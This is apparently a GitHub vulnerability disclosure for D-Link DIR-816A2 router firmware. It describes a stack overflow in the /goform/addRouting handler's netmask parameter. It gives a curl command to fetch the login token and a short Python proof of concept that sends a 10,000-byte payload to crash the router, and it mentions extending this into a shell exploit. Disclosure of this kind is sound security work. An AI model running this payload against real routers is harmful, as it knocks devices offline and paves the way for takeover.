Skip to content
main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?

Latest commit

 

Git stats

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
img
 
 
 
 

DIR-816A2_FWv1.10CNB05_R1B011D88210.img Stack overflow vulnerability

Overview

Affected version

Below is the latest firmware

Vulnerability details

Vulnerability occurs in /goform/addRouting. The content obtained by netmask parameter is passed to V3, and then the content matched by V3 is write into the V13 stack without size checking, resulting in a stack overflow.

Vulnerability verify

POC

Gets the token ID

curl http://192.168.0.1/dir_login.asp | grep tokenid

Run poc

import requests


tokenid = ''

url = 'http://192.168.0.1/goform/addRouting'

payload = b'a' * 10000

data = {
    'tokenid': tokenid,
    'dest': '1.1.1.1',
    'netmask': payload
}

print('payload sending...')
r = requests.post(url, data)
print('end')

You can see the router crash, and finally you can write an exp to get a shell